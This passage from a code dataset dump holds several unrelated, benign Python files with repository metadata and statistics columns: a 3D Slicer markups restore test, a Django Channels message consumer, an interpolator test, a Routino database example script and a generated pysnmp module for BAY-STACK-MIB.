long_description="Server Manager package",
)
| 20.666667 | 64 | 0.716129 | 37 | 310 | 5.918919 | 0.810811 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.158065 | 310 | 14 | 65 | 22.142857 | 0.816092 | 0.2 | 0 | 0 | 0 | 0 | 0.229508 | 0.094262 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.222222 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fdc3aa267ad82108937792e25090869d2290abd | 6,272 | py | Python | Modules/Loadable/Markups/Testing/Python/MarkupsSceneViewRestoreTestManyLists.py | TheInterventionCentre/NorMIT-Plan-App | 765ed9a5dccc1cc134b65ccabe93fc132baeb2ea | [
"MIT"
] | null | null | null | Modules/Loadable/Markups/Testing/Python/MarkupsSceneViewRestoreTestManyLists.py | TheInterventionCentre/NorMIT-Plan-App | 765ed9a5dccc1cc134b65ccabe93fc132baeb2ea | [
"MIT"
] | null | null | null | Modules/Loadable/Markups/Testing/Python/MarkupsSceneViewRestoreTestManyLists.py | TheInterventionCentre/NorMIT-Plan-App | 765ed9a5dccc1cc134b65ccabe93fc132baeb2ea | [
"MIT"
] | null | null | null |
# Test restoring a scene with multiple lists with different number
# of fiducials
# first fiducial list
displayNode1 = slicer.vtkMRMLMarkupsDisplayNode()
slicer.mrmlScene.AddNode(displayNode1)
fidNode1 = slicer.vtkMRMLMarkupsFiducialNode()
fidNode1.SetName("FidNode1")
slicer.mrmlScene.AddNode(fidNode1)
fidNode1.SetAndObserveDisplayNodeID(displayNode1.GetID())
coords = [0.0, 0.0, 0.0]
numFidsInList1 = 5
for i in range(numFidsInList1):
fidNode1.AddFiducialFromArray(coords)
coords[0] += 1.0
coords[1] += 2.0
coords[2] += 1.0
# second fiducial list
displayNode2 = slicer.vtkMRMLMarkupsDisplayNode()
slicer.mrmlScene.AddNode(displayNode2)
fidNode2 = slicer.vtkMRMLMarkupsFiducialNode()
fidNode2.SetName("FidNode2")
slicer.mrmlScene.AddNode(fidNode2)
fidNode2.SetAndObserveDisplayNodeID(displayNode2.GetID())
numFidsInList2 = 10
for i in range(numFidsInList2):
fidNode2.AddFiducialFromArray(coords)
coords[0] += 1.0
coords[1] += 1.0
coords[2] += 3.0
sv = slicer.mrmlScene.AddNode(slicer.vtkMRMLSceneViewNode())
numFidNodesBeforeStore = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLMarkupsFiducialNode')
sv.StoreScene()
# add a third list that will get removed on restore
# third fiducial list
displayNode3 = slicer.vtkMRMLMarkupsDisplayNode()
slicer.mrmlScene.AddNode(displayNode3)
fidNode3 = slicer.vtkMRMLMarkupsFiducialNode()
fidNode3.SetName("FidNode3")
slicer.mrmlScene.AddNode(fidNode3)
fidNode3.SetAndObserveDisplayNodeID(displayNode3.GetID())
numFidsInList3 = 2
for i in range(numFidsInList3):
fidNode3.AddFiducialFromArray(coords)
coords[0] += 1.0
coords[1] += 2.0
coords[2] += 3.0
sv.RestoreScene()
numFidNodesAfterRestore = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLMarkupsFiducialNode')
if numFidNodesAfterRestore != numFidNodesBeforeStore:
print "After restoring the scene, expected ", numFidNodesBeforeStore, " fiducial nodes, but have ", numFidNodesAfterRestore
exceptionMessage = "After restoring the scene, expected " + str(numFidNodesBeforeStore) + " fiducial nodes, but have " + str(numFidNodesAfterRestore)
raise Exception(exceptionMessage)
#fid1AfterRestore = slicer.mrmlScene.GetNodeByID("vtkMRMLMarkupsFiducialNode1")
fid1AfterRestore = slicer.mrmlScene.GetFirstNodeByName("FidNode1")
numFidsInList1AfterRestore = fid1AfterRestore.GetNumberOfMarkups()
print "After restore, list with name FidNode1 has id ", fid1AfterRestore.GetID(), " and num fids = ", numFidsInList1AfterRestore
if numFidsInList1AfterRestore != numFidsInList1:
exceptionMessage = "After restoring list 1, id = " + fid1AfterRestore.GetID()
exceptionMessage += ", expected " + str(numFidsInList1) + " but got "
exceptionMessage += str(numFidsInList1AfterRestore)
raise Exception(exceptionMessage)
# fid2AfterRestore = slicer.mrmlScene.GetNodeByID("vtkMRMLMarkupsFiducialNode2")
fid2AfterRestore = slicer.mrmlScene.GetFirstNodeByName("FidNode2")
numFidsInList2AfterRestore = fid2AfterRestore.GetNumberOfMarkups()
print "After restore, list with name FidNode2 has id ", fid2AfterRestore.GetID(), " and num fids = ", numFidsInList2AfterRestore
if numFidsInList2AfterRestore != numFidsInList2:
exceptionMessage = "After restoring list 2, id = " + fid2AfterRestore.GetID()
exceptionMessage += ", expected " + str(numFidsInList2) + " but got "
exceptionMessage += str(numFidsInList2AfterRestore)
raise Exception(exceptionMessage)
# check the displayable manager for the right number of widgets/seeds
lm = slicer.app.layoutManager()
td = lm.threeDWidget(0)
ms = vtk.vtkCollection()
td.getDisplayableManagers(ms)
fidManagerIndex = -1
for i in range(ms.GetNumberOfItems()):
m = ms.GetItemAsObject(i)
if m.GetClassName() == "vtkMRMLMarkupsFiducialDisplayableManager3D":
fidManagerIndex = i
print m.GetClassName(), fidManagerIndex
if fidManagerIndex == -1:
exceptionMessage = "Failed to find markups fiducial displayable manager 3d!"
raise Exception(exceptionMessage)
mfm = ms.GetItemAsObject(fidManagerIndex)
h = mfm.GetHelper()
print 'Helper = ',h
seedWidget1 = h.GetWidget(fid1AfterRestore)
rep1 = seedWidget1.GetRepresentation()
print "Seed widget 1 has number of seeds = ",rep1.GetNumberOfSeeds()
if rep1.GetNumberOfSeeds() != numFidsInList1AfterRestore:
exceptionMessage = "After restoring list 1, expected seed widget to have "
exceptionMessage += str(numFidsInList1AfterRestore) + " seeds, but it has "
exceptionMessage += str(rep1.GetNumberOfSeeds())
raise Exception(exceptionMessage)
# check positions
for s in range(numFidsInList1AfterRestore):
seed = seedWidget1.GetSeed(s)
handleRep = seed.GetHandleRepresentation()
worldPos = handleRep.GetWorldPosition()
print "seed ",s," world position = ",worldPos
fidPos = [0.0,0.0,0.0]
fid1AfterRestore.GetNthFiducialPosition(s,fidPos)
xdiff = fidPos[0] - worldPos[0]
ydiff = fidPos[1] - worldPos[1]
zdiff = fidPos[2] - worldPos[2]
diffTotal = xdiff + ydiff + zdiff
if diffTotal > 0.1:
exceptionMessage = "List1: Difference between seed position " + str(s)
exceptionMessage += " and fiducial position totals = " + str(diffTotal)
raise Exception(exceptionMessage)
seedWidget2 = h.GetWidget(fid2AfterRestore)
rep2 = seedWidget2.GetRepresentation()
print "Seed widget 2 has number of seeds = ",rep2.GetNumberOfSeeds()
if rep2.GetNumberOfSeeds() != numFidsInList2AfterRestore:
exceptionMessage = "After restoring fid list 2, expected seed widget to have "
exceptionMessage += str(numFidsInList2AfterRestore) + " seeds, but it has "
exceptionMessage += str(rep2.GetNumberOfSeeds())
raise Exception(exceptionMessage)
# check positions
for s in range(numFidsInList2AfterRestore):
seed = seedWidget2.GetSeed(s)
handleRep = seed.GetHandleRepresentation()
worldPos = handleRep.GetWorldPosition()
print "seed ",s," world position = ",worldPos
fidPos = [0.0,0.0,0.0]
fid2AfterRestore.GetNthFiducialPosition(s,fidPos)
xdiff = fidPos[0] - worldPos[0]
ydiff = fidPos[1] - worldPos[1]
zdiff = fidPos[2] - worldPos[2]
diffTotal = xdiff + ydiff + zdiff
if diffTotal > 0.1:
exceptionMessage = "List2: Difference between seed position " + str(s)
exceptionMessage += " and fiducial position totals = " + str(diffTotal)
raise Exception(exceptionMessage)
ms.RemoveAllItems()
| 37.333333 | 151 | 0.772162 | 636 | 6,272 | 7.61478 | 0.234277 | 0.006195 | 0.007433 | 0.007433 | 0.348338 | 0.271319 | 0.253562 | 0.216395 | 0.207722 | 0.207722 | 0 | 0.029712 | 0.125319 | 6,272 | 167 | 152 | 37.556886 | 0.853081 | 0.07111 | 0 | 0.28 | 0 | 0 | 0.164287 | 0.016171 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.072 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fdd8bc73e2b49aa962aeebacd2ae774e4162d17 | 1,013 | py | Python | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | null | null | null | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | 12 | 2020-02-12T01:14:42.000Z | 2022-03-11T23:54:43.000Z | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# @Time : 2019/7/21 12:35 PM
# @Author : __wutonghe__
# docs https://channels.readthedocs.io/en/latest/tutorial/part_3.html#rewrite-the-consumer-to-be-asynchronous
from channels.generic.websocket import AsyncWebsocketConsumer
import json
class MessageConsumer(AsyncWebsocketConsumer):
"""
私信websocket,采用异步通信来增加并发
"""
async def connect(self):
"""当 websocket 一链接上以后触发该函数"""
if self.scope['user'].is_anonymous:
await self.close()
else:
await self.channel_layer.group_add(self.scope['user'].username + '-message',self.channel_name) # 创建聊天室
await self.accept()
async def receive(self, text_data=None, bytes_data=None):
"""将答复交回给websocket"""
await self.send(text_data=json.dumps(text_data)) # 将消息发送给前端
async def disconnect(self, code):
"""断开链接时触发该函数"""
await self.channel_layer.group_discard(self.scope['user'].username + '-message',self.channel_name) # 将该链接移出聊天室
| 30.69697 | 119 | 0.669299 | 119 | 1,013 | 5.563025 | 0.638655 | 0.067976 | 0.058912 | 0.063444 | 0.208459 | 0.129909 | 0.129909 | 0.129909 | 0 | 0 | 0 | 0.01599 | 0.197433 | 1,013 | 32 | 120 | 31.65625 | 0.798278 | 0.228036 | 0 | 0 | 0 | 0 | 0.040404 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
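A consumer like the one above still needs websocket routing to be reachable; a minimal, hypothetical Channels 2.x wiring sketch follows (the URL pattern and import path are assumptions). AuthMiddlewareStack is what populates scope['user'], which connect() relies on:
# routing.py (illustrative)
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from django.urls import re_path

from msg.consumer import MessageConsumer  # assumed import path

application = ProtocolTypeRouter({
    "websocket": AuthMiddlewareStack(
        URLRouter([
            # Channels 2.x accepts the consumer class; on Channels 3+ use MessageConsumer.as_asgi()
            re_path(r"^ws/message/$", MessageConsumer),
        ])
    ),
})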
6fe090a4e22c0963ebcb0f7db477cda0fa848e0e | 2,618 | py | Python | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | import eagerpy as ep
import numpy as np
from scipy.interpolate import RegularGridInterpolator
import hypney
tl = ep.numpy
def test_regular_grid_interpolator():
"""Adapted from
https://github.com/sbarratt/torch_interpolations/blob/master/tests/test_grid_interpolator.py
"""
points = [tl.arange(-0.5, 2.5, 0.1) * 1.0, tl.arange(-0.5, 2.5, 0.2) * 1.0]
values = (
hypney.utils.eagerpy.sin(points[0])[:, None]
+ 2 * hypney.utils.eagerpy.cos(points[1])[None, :]
+ hypney.utils.eagerpy.sin(5 * points[0][:, None] @ points[1][None, :])
)
X, Y = ep.meshgrid(tl.arange(-0.5, 2, 0.1), tl.arange(-0.5, 2, 0.1))
points_to_interp = ep.stack([X.flatten(), Y.flatten()]).T
gi = hypney.utils.interpolation.RegularGridInterpolator(points, values)
fx = gi(points_to_interp)
rgi = RegularGridInterpolator(
[p.numpy() for p in points], [x.numpy() for x in values], bounds_error=False
)
rfx = rgi(points_to_interp.numpy())
np.testing.assert_allclose(rfx, fx.numpy(), atol=1e-6)
# TODO: port derivative test to eagerpy
# note that points_to_interp has to be transposed
#
# def test_regular_grid_interpolator_derivative():
# points = [torch.arange(-.5, 2.5, .5) * 1., torch.arange(-.5, 2.5, .5) * 1.]
# values = torch.sin(points[0])[:, None] + 2 * torch.cos(points[1])[None, :] + torch.sin(5 * points[0][:, None] @ points[1][None, :])
# values.requires_grad_(True)
#
# X, Y = np.meshgrid(np.arange(-.5, 2, .19), np.arange(-.5, 2, .19))
# points_to_interp = [torch.from_numpy(
# X.flatten()).float(), torch.from_numpy(Y.flatten()).float()]
#
# def f(values):
# return torch_interpolations.RegularGridInterpolator(
# points, values)(points_to_interp)
#
# torch.autograd.gradcheck(f, (values,), eps=1e-5, atol=1e-1, rtol=1e-1)
def test_interpolator_builder():
itp = hypney.utils.interpolation.InterpolatorBuilder([(-1, 0, 1)])
def scalar_f(z):
return z[0]
z = ep.astensor(np.array([1, 0, -1, 0, 1, 1, -1]))
scalar_itp = itp.make_interpolator(scalar_f)
np.testing.assert_array_equal(scalar_itp(z).numpy(), z.numpy())
def matrix_f(z):
return ep.astensor(np.ones((2, 2)) * z[0])
matrix_itp = itp.make_interpolator(matrix_f)
np.testing.assert_array_equal(
matrix_itp(z).numpy(), z[:, None, None].numpy() * np.ones((1, 2, 2))
)
# What happened here? Does the test not make sense or did the API change?
# np.testing.assert_array_equal(
# matrix_itp(ep.numpy.array([0, 0, 0])).numpy(),
# np.ones((2, 2)))
| 33.564103 | 137 | 0.632544 | 394 | 2,618 | 4.081218 | 0.266497 | 0.00995 | 0.052239 | 0.024876 | 0.214552 | 0.143657 | 0.126866 | 0.032338 | 0 | 0 | 0 | 0.040566 | 0.190222 | 2,618 | 77 | 138 | 34 | 0.717925 | 0.399924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.088235 | 1 | 0.117647 | false | 0 | 0.117647 | 0.058824 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe12a816ae34998a3fcf2329f909ed39bda660d | 8,451 | py | Python | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | 1 | 2016-02-12T20:26:31.000Z | 2016-02-12T20:26:31.000Z | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | 2 | 2019-01-16T10:00:19.000Z | 2019-02-03T10:53:32.000Z | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | null | null | null | #!/usr/bin/python3
##########################################
# Routino database access from Python.
#
# Part of the Routino routing software.
##########################################
# This file Copyright 2018 Andrew M. Bishop
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##########################################
import routino.database
# Database, access all attributes
database = routino.database.LoadDatabase("../../src/test/fat", "turns")
if database is None:
database = routino.database.LoadDatabase("../src/test/fat", "turns")
if database is None:
print("Failed to load database")
exit(1)
print(database)
database_attrs = ['nnodes', 'nsegments', 'nways', 'nrelations']
for attr in database_attrs:
print(" Attribute: " + attr + " =", getattr(database, attr))
print("")
# A single node, access all attributes and all functions
node=database.GetNode(0)
print("1st node =", node)
node_attrs = ['id', 'firstsegment', 'latitude', 'longitude', 'allow', 'flags']
node_infos = ['', '', 'degrees', 'degrees', '[note 1]', '[note 2]']
for attr,info in zip(node_attrs,node_infos):
print(" Attribute: " + attr + " =", getattr(node, attr), info)
segments = node.Segments()
print(" Function: " + "Segments()" + " = [" + ", ".join([str(segments[x]) for x in range(len(segments))]) + "]")
print("")
# A single segment, access all attributes and all functions
segment=database.GetSegment(0)
print("1st segment =", segment)
segment_attrs = ['id', 'node1', 'node2', 'next2', 'way', 'distance', 'flags']
segment_infos = ['', '', '', '', '', 'km', '[note 3]']
for attr,info in zip(segment_attrs,segment_infos):
print(" Attribute: " + attr + " =", getattr(segment, attr), info)
print(" Function: " + "Node1()" + " = " + str(segment.Node1()))
print(" Function: " + "Node2()" + " = " + str(segment.Node2()))
print(" Function: " + "Way()" + " = " + str(segment.Way()))
print("")
# A single way, access all attributes and all functions
way=database.GetWay(0)
print("1st way =", way)
way_attrs = ['id', 'name', 'allow', 'type', 'props', 'speed', 'weight', 'height', 'width', 'length']
way_infos = ['', '', '[note 1]', '[note 4]', '[note 5]', 'km/hr [note 6]', 'tonnes [note 6]', 'metres [note 6]', 'metres [note 6]', 'metres [note 6]']
for attr,info in zip(way_attrs,way_infos):
print(" Attribute: " + attr + " =", getattr(way, attr), info)
print("")
# A single relation, access all attributes and all functions
relation=database.GetRelation(0)
print("1st relation =", relation)
relation_attrs = ['id', 'from_seg', 'via_node', 'to_seg', 'from_way', 'to_way', 'from_node', 'to_node', 'except_transport']
relation_infos = ['', '', '', '', '', '', '', '', '[note 7]']
for attr,info in zip(relation_attrs,relation_infos):
print(" Attribute: " + attr + " =", getattr(relation, attr), info)
print(" Function: " + "FromSegment()" + " = " + str(relation.FromSegment()))
print(" Function: " + "ViaNode()" + " = " + str(relation.ViaNode()))
print(" Function: " + "ToSegment()" + " = " + str(relation.ToSegment()))
print(" Function: " + "FromWay()" + " = " + str(relation.FromWay()))
print(" Function: " + "ToWay()" + " = " + str(relation.ToWay()))
print(" Function: " + "FromNode()" + " = " + str(relation.FromNode()))
print(" Function: " + "ToNode()" + " = " + str(relation.ToNode()))
print("")
# The list of nodes as a list and an iterable (just the first 4)
nodes=database.Nodes()
print("len(database.Nodes()) = " + str(len(nodes)))
print("database.Nodes() = [" + ", ".join([str(nodes[x]) for x in range(4)]) + ", ...]")
for node in nodes:
if node.id == 4:
break
print(node)
print("")
# The list of segments as a list and an iterable (just the first 4)
segments=database.Segments()
print("len(database.Segments()) = " + str(len(segments)))
print("database.Segments() = [" + ", ".join([str(segments[x]) for x in range(4)]) + ", ...]")
for segment in segments:
if segment.id == 4:
break
print(segment)
print("")
# The list of ways as a list and an iterable (just the first 4)
ways=database.Ways()
print("len(database.Ways()) = " + str(len(ways)))
print("database.Ways() = [" + ", ".join([str(ways[x]) for x in range(4)]) + ", ...]")
for way in ways:
if way.id == 4:
break
print(way)
print("")
# The list of relations as a list and an iterable (just the first 4)
relations=database.Relations()
print("len(database.Relations()) = " + str(len(relations)))
print("database.Relations() = [" + ", ".join([str(relations[x]) for x in range(4)]) + ", ...]")
for relation in relations:
if relation.id == 4:
break
print(relation)
print("")
# Enumerated lists
transports_enum = ["Transports_None",
"Transports_Foot",
"Transports_Horse",
"Transports_Wheelchair",
"Transports_Bicycle",
"Transports_Moped",
"Transports_Motorcycle",
"Transports_Motorcar",
"Transports_Goods",
"Transports_HGV",
"Transports_PSV",
"Transports_ALL"]
nodeflags_enum = ["Nodeflag_Super",
"Nodeflag_U_Turn",
"Nodeflag_Mini_Roundabout",
"Nodeflag_Turn_Restrict",
"Nodeflag_Turn_Restrict2"]
segmentflags_enum = ["Segmentflag_Area",
"Segmentflag_Oneway_1to2",
"Segmentflag_Oneway_2to1",
"Segmentflag_Super",
"Segmentflag_Normal"]
properties_enum = ["Properties_None",
"Properties_Paved",
"Properties_Multilane",
"Properties_Bridge",
"Properties_Tunnel",
"Properties_FootRoute",
"Properties_BicycleRoute",
"Properties_ALL"]
highway_enum = ["Highway_Motorway",
"Highway_Trunk",
"Highway_Primary",
"Highway_Secondary",
"Highway_Tertiary",
"Highway_Unclassified",
"Highway_Residential",
"Highway_Service",
"Highway_Track",
"Highway_Cycleway",
"Highway_Path",
"Highway_Steps",
"Highway_Ferry",
"Highway_Count",
"Highway_CycleBothWays",
"Highway_OneWay",
"Highway_Roundabout",
"Highway_Area"]
def print_enum(list):
for item in list:
print(" routino.database."+item)
print("Note 1: The Node's and Way's 'allow' parameter can be the combination of these enumerated values:")
print_enum(transports_enum)
print("")
print("Note 2: The Node's 'flags' parameter can be the combination of these enumerated values:")
print_enum(nodeflags_enum)
print("")
print("Note 3: The Segment's 'flags' parameter can be the combination of these enumerated values:")
print_enum(segmentflags_enum)
print("")
print("Note 4: The Way's 'type' parameter can be one the combination of these enumerated values:")
print_enum(highway_enum)
print("")
print("Note 5: The Way's 'props' parameter can be the combination of these enumerated values:")
print_enum(properties_enum)
print("")
print("Note 6: A value of zero for a Way's speed, weight, height, width or length means that there is no limit.")
print("")
print("Note 7: The Relation's 'except_transport' parameter can be the combination of these enumerated values:")
print_enum(transports_enum)
print("")
import gc
gc.collect()
| 30.956044 | 156 | 0.587504 | 964 | 8,451 | 5.047718 | 0.254149 | 0.029388 | 0.017263 | 0.025894 | 0.254829 | 0.217016 | 0.182491 | 0.15783 | 0.140567 | 0.126182 | 0 | 0.009107 | 0.246361 | 8,451 | 272 | 157 | 31.069853 | 0.754907 | 0.153591 | 0 | 0.152866 | 0 | 0.019108 | 0.363481 | 0.03872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006369 | false | 0 | 0.012739 | 0 | 0.019108 | 0.414013 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
6fe25b4c2678c24198e66f7fedfb9fb15fdcf64a | 5,498 | py | Python | pysnmp/BAY-STACK-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/BAY-STACK-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/BAY-STACK-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module BAY-STACK-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/BAY-STACK-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:19:06 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, Counter64, Bits, Counter32, ModuleIdentity, ObjectIdentity, IpAddress, iso, Integer32, NotificationType, MibIdentifier, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "Counter64", "Bits", "Counter32", "ModuleIdentity", "ObjectIdentity", "IpAddress", "iso", "Integer32", "NotificationType", "MibIdentifier", "Unsigned32")
TruthValue, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "DisplayString")
bayStackMibs, = mibBuilder.importSymbols("SYNOPTICS-ROOT-MIB", "bayStackMibs")
bayStackMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 45, 5, 13))
bayStackMib.setRevisions(('2013-10-11 00:00', '2012-10-02 00:00', '2009-09-28 00:00', '2007-09-04 00:00', '2005-08-22 00:00',))
if mibBuilder.loadTexts: bayStackMib.setLastUpdated('201310110000Z')
if mibBuilder.loadTexts: bayStackMib.setOrganization('Nortel Networks')
bayStackObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 13, 1))
bayStackConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1))
bayStackConfigExpectedStackSize = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigExpectedStackSize.setStatus('current')
bayStackConfigStackErrorNotificationInterval = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(60)).setUnits('Seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigStackErrorNotificationInterval.setStatus('current')
bayStackConfigStackErrorNotificationEnabled = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 3), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigStackErrorNotificationEnabled.setStatus('current')
bayStackConfigStackRebootUnitOnFailure = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 4), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigStackRebootUnitOnFailure.setStatus('current')
bayStackConfigStackRetryCount = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 5), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigStackRetryCount.setStatus('current')
bayStackUnitConfigTable = MibTable((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2), )
if mibBuilder.loadTexts: bayStackUnitConfigTable.setStatus('current')
bayStackUnitConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2, 1), ).setIndexNames((0, "BAY-STACK-MIB", "bayStackUnitConfigIndex"))
if mibBuilder.loadTexts: bayStackUnitConfigEntry.setStatus('current')
bayStackUnitConfigIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bayStackUnitConfigIndex.setStatus('current')
bayStackUnitConfigRearPortAdminMode = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standalone", 1), ("stacking", 2), ("spb", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackUnitConfigRearPortAdminMode.setStatus('current')
bayStackUnitConfigRearPortOperMode = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standalone", 1), ("stacking", 2), ("spb", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bayStackUnitConfigRearPortOperMode.setStatus('current')
